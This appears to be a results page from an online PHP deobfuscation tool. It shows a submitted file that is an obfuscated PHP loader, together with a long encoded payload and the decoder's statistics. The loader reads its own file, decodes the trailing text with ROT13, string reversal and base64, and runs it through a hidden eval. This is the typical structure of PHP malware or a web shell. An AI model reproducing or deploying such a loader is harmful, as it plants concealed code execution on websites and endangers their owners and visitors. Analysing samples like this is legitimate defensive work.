Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $L86Rgr=explode(base64_decode("Pz4="),file_get_contents/*******/(__FILE__)); $L8CRg..

Decoded Output download

<?php 
$L86Rgr=explode(base64_decode("Pz4="),file_get_contents/*******/(__FILE__)); $L8CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13($L86Rgr[1]))));$L7CRgr = "6c38ff7eb80f759b67633cbb71035895";preg_replace($L8CRgr[0],serialize(/****/@eval/****/($L8CRgr[2])),$L8CRgr[1]);exit();?>=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 
 
?>

Did this file decode correctly?

Original Code

<?php
$L86Rgr=explode(base64_decode("Pz4="),file_get_contents/*******/(__FILE__)); $L8CRgr=array(base64_decode("L3gvaQ=="),base64_decode("eA=="),base64_decode(strrev(str_rot13($L86Rgr[1]))));$L7CRgr = "6c38ff7eb80f759b67633cbb71035895";preg_replace($L8CRgr[0],serialize(/****/@eval/****/($L8CRgr[2])),$L8CRgr[1]);exit();?>=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

?>

Function Calls

explode 1
base64_decode 3
file_get_contents 1

Variables

$L86Rgr None

Stats

MD5 d494cc105f1ee2189eed83fda255b460
Eval Count 0
Decode Time 533 ms